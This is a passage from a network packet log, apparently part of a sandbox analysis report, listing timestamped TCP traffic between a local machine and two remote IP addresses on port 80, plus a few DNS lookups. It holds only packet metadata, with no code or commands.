                                                                                                              Nov 24, 2022 10:05:44.088978052 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.089016914 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.089061022 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.089066029 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:44.089101076 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.089284897 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.089327097 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.089504004 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.089545965 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.090061903 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.091180086 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.091892004 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.091932058 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.092044115 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.092086077 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.092128038 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.092166901 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.092279911 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.092320919 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.092360973 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.092401028 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.092441082 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.092617989 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.092658997 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.092699051 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.092742920 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.092782974 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.093048096 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.093091011 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.093132019 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.093173981 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.093430042 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.093451023 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.093470097 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.093487978 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.093507051 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.093525887 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.093544960 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.093563080 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.093674898 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.093693018 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.093712091 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.093791962 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.093811035 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.093947887 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.093966961 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.093987942 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.094006062 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.094027042 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.094046116 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.094063997 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.094172955 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.094191074 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.094441891 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.134279966 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.134310007 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.190258980 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.190306902 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.190340996 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.190370083 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.190478086 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.190510988 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.190654993 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.190685034 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.190789938 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.190820932 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.190983057 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.191015959 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.191046953 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.191178083 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.191210985 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.191298962 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.191330910 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.191427946 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.191458941 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.192101002 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.192131996 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.192166090 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.192222118 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.192322016 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.192362070 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.192629099 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.192658901 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.192687035 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.192728996 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.192774057 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.192805052 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.193439007 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.193474054 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.193504095 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.193800926 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.193835974 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.194102049 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.195411921 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.195445061 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.195549011 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.196079016 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.196113110 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.196171999 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.196214914 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.196254015 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.196687937 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.249612093 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:44.418423891 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:49.250013113 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:49.250092030 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:49.303539991 CET4970080192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:49.318043947 CET4970180192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:49.404802084 CET804970013.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:49.418869972 CET804970113.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:49.418970108 CET4970180192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:49.419418097 CET4970180192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:49.520118952 CET804970113.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:49.575807095 CET804970113.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:49.715740919 CET4970180192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:52.772262096 CET4970180192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:52.777414083 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:52.803467989 CET4969780192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:52.833399057 CET8049697208.95.112.1192.168.2.5
                                                                                                              Nov 24, 2022 10:05:52.833667040 CET4969780192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:52.873838902 CET804970113.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:52.874046087 CET4970180192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:52.879545927 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:52.879667997 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:52.879879951 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:52.973582983 CET4970480192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:52.981043100 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:53.003945112 CET8049704208.95.112.1192.168.2.5
                                                                                                              Nov 24, 2022 10:05:53.004139900 CET4970480192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:53.004415035 CET4970480192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:53.039249897 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:53.042753935 CET8049704208.95.112.1192.168.2.5
                                                                                                              Nov 24, 2022 10:05:53.216110945 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:53.216190100 CET4970480192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:53.346751928 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:53.447854996 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:53.542736053 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:53.622396946 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:53.660933018 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:53.762218952 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:53.771998882 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:53.825514078 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:54.253127098 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:54.397829056 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:54.401341915 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:54.528636932 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:54.529164076 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:54.630000114 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:54.635700941 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:54.716250896 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:54.940526962 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:55.048121929 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:55.145344973 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:55.213009119 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:55.354645014 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:55.466600895 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:55.573147058 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:55.685446024 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:55.798619032 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:55.904236078 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:56.016099930 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:56.019697905 CET4970480192.168.2.5208.95.112.1
                                                                                                              Nov 24, 2022 10:05:56.122536898 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:56.122852087 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:56.265774965 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:56.276272058 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:56.406706095 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:56.507683039 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:56.518187046 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:56.638665915 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:56.748296022 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:56.825737000 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:56.866013050 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:56.980732918 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:57.028875113 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:57.091743946 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:57.233922005 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:57.254293919 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:57.325783014 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:57.357608080 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:57.458760977 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:57.468750000 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:57.528912067 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:57.577466965 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:57.692078114 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:57.795171022 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:57.907229900 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:58.013896942 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:58.157640934 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:58.202336073 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:58.310642004 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:58.413201094 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:58.421519995 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:58.529004097 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:58.529437065 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:58.639164925 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:58.716541052 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:58.748105049 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:58.857167959 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:58.966923952 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:59.109796047 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:59.132725954 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:59.248868942 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:59.350146055 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:59.355093956 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:59.467259884 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:59.575210094 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:59.685913086 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:05:59.796618938 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:05:59.904557943 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:00.049839020 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:26.304919958 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:26.359575033 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:26.406785011 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:26.508022070 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:26.601267099 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:26.656641960 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:26.723223925 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:26.824193001 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:26.836591005 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:26.890786886 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:26.938206911 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:27.048418999 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:27.094065905 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:27.157444000 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:27.302031994 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:27.315444946 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:27.359757900 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:27.422898054 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:27.523958921 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:27.530560970 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:27.578330040 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:27.641423941 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:27.752068996 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:27.797142982 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:27.860275030 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:27.979752064 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:28.031513929 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:28.094470024 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:28.238220930 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:28.255086899 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:28.312772036 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:28.367805004 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:28.469238997 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:28.476284981 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:28.517688036 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:28.585969925 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:28.695064068 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:28.734680891 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:28.797561884 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:28.928524971 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:28.984842062 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:29.188267946 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:29.334059000 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:29.470705032 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:29.516021967 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:29.622708082 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:29.745826960 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:29.745882034 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:29.797316074 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:30.177222013 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:30.322473049 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:30.330084085 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:30.375579119 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:30.438369989 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:30.540405989 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:30.547013998 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:30.594202995 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:30.709228039 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:30.818365097 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:30.859910011 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:30.927628040 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:31.034219027 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:31.078677893 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:31.378030062 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:31.521699905 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:31.532601118 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:31.578689098 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:31.650194883 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:31.751296043 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:31.774255037 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:31.828701019 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:31.876197100 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:31.983685970 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:32.031949043 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:32.094784021 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:32.237997055 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:32.250843048 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:32.297596931 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:32.382090092 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:32.483324051 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:32.489087105 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:32.531872034 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:32.594750881 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:32.705264091 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:32.750842094 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:32.814179897 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:32.925527096 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:32.969597101 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:33.032474041 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:33.174148083 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:33.187192917 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:33.235161066 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:33.298073053 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:33.399271011 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:33.404689074 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:33.454020977 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:33.516836882 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:33.634458065 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:33.688388109 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:33.735600948 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:33.843596935 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:33.891554117 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:33.954220057 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:34.097799063 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:34.107176065 CET804970313.90.128.253192.168.2.5
                                                                                                              Nov 24, 2022 10:06:34.157001972 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:34.220388889 CET4970380192.168.2.513.90.128.253
                                                                                                              Nov 24, 2022 10:06:34.321566105 CET804970313.90.128.253192.168.2.5

                                                                                                              UDP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Nov 24, 2022 10:05:03.955020905 CET5494953192.168.2.58.8.8.8
                                                                                                              Nov 24, 2022 10:05:03.972485065 CET53549498.8.8.8192.168.2.5
                                                                                                              Nov 24, 2022 10:05:11.936229944 CET5821853192.168.2.58.8.8.8
                                                                                                              Nov 24, 2022 10:05:11.957767010 CET53582188.8.8.8192.168.2.5
                                                                                                              Nov 24, 2022 10:05:14.093523026 CET6099853192.168.2.58.8.8.8
